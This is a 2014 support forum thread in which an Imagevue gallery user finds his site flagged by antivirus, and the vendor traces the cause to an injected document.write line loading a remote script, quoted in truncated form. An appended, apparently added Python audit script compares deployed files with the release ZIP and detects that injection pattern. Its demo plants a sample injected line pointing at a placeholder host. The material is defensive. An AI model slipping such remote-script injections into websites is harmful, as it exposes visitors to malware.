
X3 Photo Gallery Support Forums

abertrande
Experienced
Topic Author
Posts: 121
Joined: 03 Jul 2013, 06:13

My Website infected on windows

11 Jan 2014, 13:59

Hi,

A client told me he could not see my website (http://www.abertrande.com);
his antivirus reports a malicious file.
I'm on a Mac and I don't see this problem.

12/01/14: I tried to connect to my website from a Windows system: the iv-includes folder is infected (avast antivirus report).
I have deleted my "www" folder and reinstalled Imagevue (2.8.10.3) following your procedure (https://www.photo.gallery/documentation/upgrade-imagevue/). I have changed my FTP password, but I have the same problem.
My clients and I don't understand what is happening.

Arnaud
 
mjau-mjau
X3 Wizard
Posts: 13998
Joined: 30 Sep 2006, 03:37

Re: My Website infected on windows

13 Jan 2014, 00:20

I did some research, and found the script where something had been injected:
http://www.abertrande.com/iv-includes/a ... sewheel.js

Compare it to the authentic Imagevue script and how it looks from within our ZIP file:
https://www.photo.gallery/demo/x2/iv-include ... sewheel.js

As you can see, there is some code:
Code
document.write('<script src="*******webxpress.co.php53-17 ...
I am not sure what this does or tries to do, but I can see your website makes some calls to scripts on that server. If you recently upgraded, I am not sure how it got there ... Either your admin was not properly passworded, or maybe you were using an older version of Imagevue? In either case, delete this file and re-upload it, and check that the local files in your ZIP are clean ... Check the date at which time this file was last modified on your server?
 
abertrande
Experienced
Topic Author
Posts: 121
Joined: 03 Jul 2013, 06:13

Re: My Website infected on windows

13 Jan 2014, 03:45

Thanks for your reply.

"Either your admin was not properly passworded,"
I have changed the password with FileZilla.

"maybe you were using an older version of Imagevue?"
I have installed the latest version, 2.8.10.3, the same as I had before.

Today I re-uploaded the iv-includes folder (I downloaded the version from your site).
I have the same problem... no change :(
 
abertrande
Experienced
Topic Author
Posts: 121
Joined: 03 Jul 2013, 06:13

Re: My Website infected on windows

13 Jan 2014, 05:30

Update 13/01/14 11:28
...I have re-uploaded all folders and the Powerpack too.
I have changed all passwords... now it's OK... I think.
 
mjau-mjau
X3 Wizard
Posts: 13998
Joined: 30 Sep 2006, 03:37

Re: My Website infected on windows

13 Jan 2014, 10:18

Yes, it's fixed now and does not make any remote calls ... I would be cautious though, as someone must have been able to access and upload or edit a file earlier somehow. Check the file mentioned earlier once in a while to make sure it does not get edited. Did you replace everything in the Imagevue folder except your content folder?
 
abertrande
Experienced
Topic Author
Posts: 121
Joined: 03 Jul 2013, 06:13

Re: My Website infected on windows

13 Jan 2014, 10:55

Yes, I do not understand what happened.
I changed all passwords.
I changed all folders except "content" and "iv-config".
Maybe you can help me choose the permissions for the files with FileZilla.
For now:
www: 744
iv-includes and iv-admin: 700
the rest: 744
Thanks a lot
 
mjau-mjau
X3 Wizard
Posts: 13998
Joined: 30 Sep 2006, 03:37

Re: My Website infected on windows

14 Jan 2014, 01:27

Normally, you should not change permissions on any folders except the ones where Imagevue needs to write ... that would be the /iv-config/ folder and the /content/ folder. The other folders should remain in your server's default permission state on upload ...
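
One way to automate the checks suggested in this thread (compare the deployed files with the clean ZIP, look at the last-modified date, re-check once in a while), as an added example that is not part of the original posts or Imagevue's own code. The function names, sample files and the `injected.example` host are constructed for illustration; `content` and `iv-config` are skipped because the thread names them as the folders Imagevue writes to.

```python
import hashlib, io, re, tempfile, time, zipfile
from pathlib import Path, PurePosixPath

# Folders Imagevue writes to (per the thread); they legitimately differ from the ZIP.
SKIP = {"content", "iv-config"}
# Pattern of the injection quoted in the thread: document.write pulling in a remote script.
INJECT = re.compile(rb"document\.write\(\s*['\"]<script[^>]*\bsrc=", re.I)

def audit(zip_bytes, webroot):
    """Compare deployed files with the clean release ZIP and return the findings."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
        for info in z.infolist():
            parts = PurePosixPath(info.filename).parts
            if info.is_dir() or parts[0] in SKIP:
                continue
            deployed = Path(webroot, *parts)
            if not deployed.is_file():
                findings.append((info.filename, "missing", None, False))
                continue
            data = deployed.read_bytes()
            if hashlib.sha256(data).digest() != hashlib.sha256(z.read(info)).digest():
                stamp = time.localtime(deployed.stat().st_mtime)
                mtime = time.strftime("%Y-%m-%d %H:%M", stamp)
                findings.append((info.filename, "modified", mtime, bool(INJECT.search(data))))
    return findings

def demo():
    """Constructed sample: a two-file 'release' and a webroot with one tampered script."""
    clean = {"iv-includes/a.js": b"var wheel = 1;\n", "iv-admin/index.php": b"<?php // admin\n"}
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, body in clean.items():
            z.writestr(name, body)
    with tempfile.TemporaryDirectory() as root:
        for name, body in clean.items():
            p = Path(root, name)
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_bytes(body)
        # Constructed injection in the style quoted above; the host is a placeholder.
        tampered = b"document.write('<script src=\"http://injected.example/x.js\"></script>');\n"
        Path(root, "iv-includes/a.js").write_bytes(clean["iv-includes/a.js"] + tampered)
        return audit(buf.getvalue(), root)

if __name__ == "__main__":
    for name, status, mtime, injected in demo():
        print(f"{status:8} {name}  mtime={mtime}  remote-script-injection={injected}")
```

Run from a scheduled job against the real release ZIP and web root, any non-empty result means a shipped file no longer matches the vendor copy.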
 
abertrande
Experienced
Topic Author
Posts: 121
Joined: 03 Jul 2013, 06:13

Re: My Website infected on windows

14 Jan 2014, 02:56

OK
Thanks a lot for your help